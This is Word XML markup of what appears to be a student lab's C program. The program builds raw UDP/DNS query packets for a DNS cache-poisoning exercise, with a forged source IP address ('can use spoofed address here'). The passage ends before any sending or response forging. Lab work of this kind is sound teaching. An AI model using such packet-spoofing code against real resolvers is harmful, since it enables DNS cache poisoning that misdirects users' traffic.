    <w:p w14:paraId="4AA4DEF0" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32097D3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int main(int argc, char *argv[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E30814B" w14:textId="7ADC052C" w:rsidR="002C29DB" w:rsidRDefault="00871E60" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BF6271" w14:textId="77777777" w:rsidR="00871E60" w:rsidRPr="002C29DB" w:rsidRDefault="00871E60" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35DD079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This is to check the argc number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B78200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if (argc != 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3073D2" w14:textId="77777777" w:rsidR="00871E60"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r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">printf("- Invalid parameters!!!\nPlease enter 2 ip addresses\nFrom first to last:src_IP  </w:t>
      </w:r>
      <w:r w:rsidR="00871E60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A71FBB8" w14:textId="151A012F" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="00871E60" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:r w:rsidR="002C29DB" w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>dest_IP \n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D2A4D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r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>exit(-1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590A0A7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714072EF" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508636C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socket descriptor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EF74B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int sd;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485E3C5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buffer to hold the packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623DD2F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char buffer[PCKT_LEN];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D2FCC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set the buffer to 0 for all bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5138878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memset(buffer, 0, PCKT_LEN);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B53904" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43590D8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Our own headers' structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69651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struct ipheader *ip = (struct ipheader *)buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4857EF42" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="708290E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struct udpheader *udp = (struct udpheader *)(buffer + sizeof(struct ipheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFD5378" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2077F7F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struct dnsheader *dns=(struct dnsheader*) (buffer +sizeof(struct ipheader)+sizeof(struct udpheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356F87C2" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B7E19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data is the pointer points to the first byte of the dns payload  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3356159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char *data=(buffer +sizeof(struct ipheader)+sizeof(struct udpheader)+sizeof(struct dnsheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0887942F" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="544C7D6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1572D5D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dns fields(UDP payload field)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71819C1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relate to the lab, you can change them. begin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144F525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4217926D" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5934D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//The flag you need to set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024DF741" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04131A7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dns-&gt;flags=htons(FLAG_Q);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEBBE6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//only 1 query, so the count should be one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF5089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dns-&gt;QDCOUNT=htons(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C588CC2" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1CD5E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//query string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7945E5B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strcpy(data,"\5aaaaa\7example\3com");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09897FC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int length= strlen(data)+1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF701D3" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="710DFF6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//this is for convinience to get the struct type write the 4bytes in a more organized way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410AEC4D" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B182B8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struct dataEnd * end=(struct dataEnd *)(data+length);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4949AC0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end-&gt;type=htons(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A9E2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end-&gt;class=htons(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71713A4B" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FD6351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77BEEE0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72BF1B8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DNS format, relate to the lab, you need to change them, end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288FC38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2E4C5EB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42DA826C" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53CA514F" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139E2901" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3597D50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1CD3E98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Construction of the packet is done. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B18E5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now focus on how to do the settings and send the packet we have composed out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EADA9D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0758A27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Source and destination addresses: IP and port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5CE25A" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6488F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struct sockaddr_in sin, din;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E71F5B" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38AAC5B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int one = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A70E225" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A049E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const int *val = &amp;one;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B411AE8" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB2224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dns-&gt;query_id= rand(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD8E7A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transaction ID for the query packet, use random #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3B31C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dns-&gt;query_id= rand() % 3000; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F0954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transaction ID for the query packet, use random #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209B887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printf("Transaction ID is %d\n", dns-&gt;query_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CEA4CF"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Create a raw socket with UDP protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5795446F" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="146F28C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sd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077AF9BD" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CB6CA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if(sd&lt;0 ) // if socket fails to be created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E14F85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printf("socket error\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05883D76" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56AA842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The source is redundant, may be used later if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C8D0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The address family</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDC377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sin.sin_family = AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0148A0D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din.sin_family = AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4FB61E" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F0A7E7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Port numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A2207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sin.sin_port = htons(33333);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C4B73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din.sin_port = htons(53);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B5C373" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F17E00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IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FA50C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sin.sin_addr.s_addr = inet_addr(argv[2]); // this is the second argument we input into the program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFA7D4B" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A5A8A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din.sin_addr.s_addr = inet_addr(argv[1]); // this is the first argument we input into the program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C42B7B3" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="668E22F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Fabricate the IP header or we can use the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E169B9" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A1DD4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standard header structures but assign our own values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B315C1" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492AE89C" w14:textId="0FEA3246" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="00F5607B" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    ip-&gt;iph_ihl = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2A82E4" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FEC0C9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ip-&gt;iph_ver = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196EB12D" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="468FC59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ip-&gt;iph_tos = 0; // Low delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149B2AB0" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC161B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unsigned short int packetLength =(sizeof(struct ipheader) + sizeof(struct udpheader)+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CDFFF8" w14:textId="59497E1D"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r w:rsidR="001B6DCD" w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sizeof (</w:t>
      </w:r>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">struct dnsheader)+length+sizeof(struct dataEnd)); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E1B52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length + dataEnd_size == UDP_payload_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF017EC" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D2A8C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ip-&gt;iph_len=htons(packetLength);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A0BCDF" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7A78C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ip-&gt;iph_ident = htons(rand()); // we give a random number for the identification#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51791661" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5C732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ip-&gt;iph_ttl = 110; // hops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB9CEC5" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="493E393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ip-&gt;iph_protocol = 17; // UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732641DB" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DB95BF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Source IP address, can use spoofed address here!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0980F8" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A5A86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ip-&gt;iph_sourceip = inet_addr(argv[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B1AA9" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="027AC70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The destination IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B31EDF2" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="058242A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ip-&gt;iph_destip = inet_addr(argv[2]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71447E39" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BAB445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Fabricate the UDP header. Source port number, redundant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2468E21F" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B77B2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udp-&gt;udph_srcport = htons(40000+rand()%10000);  // source port number, I make them random... remember the lower number may be reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FB7FD9" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7664800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Destination port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08903801" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC13F5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udp-&gt;udph_destport = htons(53);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A73F7F" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
